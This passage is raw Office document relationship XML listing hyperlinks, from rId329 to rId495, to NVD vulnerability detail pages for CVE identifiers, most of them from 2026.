Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87510" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87524" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87553" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87572" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87578" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87582" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87604" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87616" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87618" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87628" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87639" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87644" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87648" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12855" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24262" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24263" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44506" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47626" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53761" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53938" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54556" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55528" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55533" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55571" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63135" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63376" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6485" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77358" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78491" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85730" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86145" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86251" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86297" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18147" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32257" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32258" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50979" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53580" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55065" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55228" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64679" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65181" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71809" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73334" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75464" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76009" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77317" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77567" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78839" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81891" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81892" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86242" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86479" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87016" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87036" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87075" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87457" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87467" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87471" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87499" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87505" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87509" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87514" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87530" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87533" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87537" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87554" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87606" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87874" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30826" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30890" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31803" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31880" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49832" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52831" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52833" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79755" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44629" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17499" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21087" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21088" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21089" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21090" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21091" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30512" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45200" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49360" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52489" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52492" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54757" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57170" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68508" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71382" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71613" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78136" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78482" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78484" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78493" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86504" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9852" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9853" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9854" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15140" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15913" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34948" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55658" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55864" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57171" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61617" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61792" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77646" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79637" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87084" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87996" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38822" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47666" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53635" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54245" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55532" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77368" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80182" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-44319" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51675" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-52182" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61478" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61479" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61480" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14296" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14957" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15406" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15667" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16960" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17470" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18058" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18453" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22591" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27462" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27490" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30866" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33630" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37198" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37237" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37736" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38346" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38348" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38349" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38350" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38636" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38638" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46369" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47895" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48486" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52482" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53587" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54788" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55099" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55484" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55525" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55553" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55584" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55620" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55841" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5680" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63421" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63462" TargetMode="External" Id="rId495" /><Relationship 